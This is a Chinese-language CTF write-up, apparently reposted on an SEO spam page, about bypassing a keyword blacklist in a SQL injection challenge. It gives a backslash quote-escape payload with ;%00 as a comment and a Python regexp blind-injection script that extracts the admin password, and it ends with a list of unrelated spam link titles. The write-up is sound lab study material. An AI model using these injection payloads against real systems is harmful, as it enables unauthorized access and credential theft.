当前位置: 首页 > news >正文

导购类网站怎么做培训机构哪家好

导购类网站怎么做,培训机构哪家好,网站如何被收录情况,深圳做微藻的公司网站欸嘿,继续sql注入。又是新的sql注入类型 很直接哦,给出了sql查询语句。简单扫描一下,robots.txt还能访问。里边提示hint.txt $black_list "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00…

欸嘿,继续sql注入。又是新的sql注入类型

 很直接哦,给出了sql查询语句。简单扫描一下,robots.txt还能访问。里边提示hint.txt

$black_list = "/limit|by|substr|mid|,|admin|benchmark|like|or|char|union|substring|select|greatest|%00|\'|=| |in|<|>|-|\.|\(\)|#|and|if|database|users|where|table|concat|insert|join|having|sleep/i";If $_POST['passwd'] === admin's password,Then you will get the flag;

 过滤了一些东西,而且只要密码对了就能拿到flag。来看看fuzz结果吧 。

 

过滤有点多哦,而且我还没放完。单引号被过滤了,一刀砍在大动脉。但是路堵了,不代表窗户也封了。我突然想到反斜杠将引号转义,在将后边的引号注释掉不就绕过了吗?思路的确是这个思路,不过常规盲注与常规注入关键字被过滤差不多,看了大佬wp,说重点在regexp上。

payload大概就是这个样子

username=\&passwd=||(True);%00

 查询语句变成了以下形式。其中一个单引号被 \ 影响,成了普通字符,导致单引号闭合错误

select * from users where username='\' and passwd='||(True);%00'

 ;%00代替注释符

 ()代替空格。%09 /**/也是可以的代替空格的

返回正确会有一个welcome.php。接下来就是脚本运行正则盲注了

||(passwd)regexp("^Yo");%00 

含义:匹配当前表下,passwd列里的内容是否为YO或者yo。

说真的这种写法第一次见还是有点突兀。因为是正则匹配,所以在脚本中,一定要过滤掉通配符("*","+","?")。不然脚本就会一直卡在通配符。而且这个passwd列名,是猜的。估计是hint.txt里有个passwd。。。。

import requests
from urllib import parseflag=''
url='http://019f0128-771d-48bb-8dab-8b6e9995ca8d.node5.buuoj.cn:81/index.php'
for i in range(1,500,1):for y in range(1,128,1):x=flag+chr(y)data='||passwd/**/regexp/**/"^{}";{}'.format(parse.unquote(x),parse.unquote('%00'))  #%00也要解码#print(chr(y))content = {'username': '\\',                   #防转义'passwd': data}#print(data)datas=requests.post(url=url,data=content)if chr(y)=='*' or chr(y)=='+' or chr(y)=='?':   #因为是正则匹配,所以要过滤通配符continueelif "welcome" in datas.text:flag=flag+chr(y)print(flag)break

 自己写的脚本有点烂,见谅。

 

因为大小写不区分,所以这里还得转小写。

print('YOU_WILL_NEVER_KNOW7788990'.lower())
#you_will_never_know7788990

登录就能拿到flag了 。

 

http://www.zhongyajixie.com/news/17804.html

相关文章:

  • 广告投放的理解seo查询工具
  • 郑州教育培训机构网站建设邳州网站开发
  • windows搭建网站投诉百度最有效的电话
  • dede网站网页主页链接百度地图网页版
  • 网站和微信 微网站解决方案网络广告网站
  • 廊坊网站开发国内专业seo公司
  • 大连做网站 选领超科技seo的五个步骤
  • 微网站建设合同武汉网站seo推广
  • 哪个网站做任务给东西网站发布与推广方案
  • 用网站的源代码怎么做网站深圳百度搜索排名优化
  • 微信做网站的公司百度网站怎么做
  • 江苏华东建设基础工程有限公司网站潍坊百度关键词优化
  • wordpress整站https河南制作网站
  • 网站推广六种方法成人计算机培训机构哪个最好
  • 陕西省建设厅网站首页关键seo排名点击软件
  • 网站广告位代码百度导航2023年最新版
  • porto 4wordpress下载网站建设优化推广系统
  • phpcms v9网站建设入门郑州网站seo服务
  • 网站建设高级专员竞价排名的定义
  • 天津的公司能在北京做网站备案吗国产免费crm系统有哪些在线
  • 上门做美容的网站百度站长提交
  • wordpress商店模板seo管理系统
  • table做网站河南网站推广优化
  • 网站建设公司 专题制作百度问答兼职怎么做
  • 怎么在南京人社网站做失业登记深圳优化seo排名
  • 制作大型网站开发windows优化大师是哪个公司的
  • 黔西县城市建设局网站免费网站做seo
  • 南京做网站优化的企业seo排名app
  • 规划阿里巴巴网站怎么做百度网盘搜索引擎
  • 杭州做网站企业专业培训机构